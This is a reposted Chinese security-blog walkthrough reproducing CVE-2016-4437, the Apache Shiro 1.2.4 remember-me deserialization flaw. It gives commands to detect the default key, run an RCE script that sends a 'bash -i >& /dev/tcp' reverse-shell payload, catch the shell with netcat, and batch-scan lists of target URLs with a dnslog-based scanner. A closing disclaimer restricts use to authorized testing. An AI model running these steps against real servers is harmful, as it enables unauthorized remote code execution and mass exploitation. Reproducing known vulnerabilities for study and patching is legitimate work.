本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现 CVE-2016-4437 Shiro1.2.4反序列化漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
ApacheShiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
ApacheShiro1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
![图片[1]-CVE-2016-4437 Shiro1.2.4反序列化漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd140630.png)
0x03 漏洞复现
漏洞版本:
- Apache Shiro <= 1.2.4
1.执行ShiroKeyCheck_windows-amd64.exe发现存在漏洞并爆出密钥
ShiroKeyCheck_windows-amd64.exe -u http:<em>//192.168.99.111:8080/login</em>![图片[2]-CVE-2016-4437 Shiro1.2.4反序列化漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd140702.png)
2. 使用shiro-1.2.4_rce.py反弹shell(代码34行可以根据实际的key自己加)
python3 shiro-1.2.4_rce.py http://x.x.x.x:8080/login
System (linux or windows): linux
bash -i >& /dev/tcp/x.x.x.x/7777 0>&1![图片[3]-CVE-2016-4437 Shiro1.2.4反序列化漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd141453.png)
3. nc监听得到一个shell
nc.exe -lvvp 77774. 也可以使用shiroFscan批量扫描url
(1.默认有100多个key,可在23行自行添加
2.需要修改第124行的dnslog地址
3.url.txt中写入目标地址列表,格式 http://xxxx 或者 http://xxxxx:000 4.python3运行脚本 观察dnslog服务器即可)
python3 shiroFscan.py![图片[4]-CVE-2016-4437 Shiro1.2.4反序列化漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd141523.png)
© 版权声明
渗透云记的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
渗透云记拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:admin@encenc.com
THE END
请登录后查看评论内容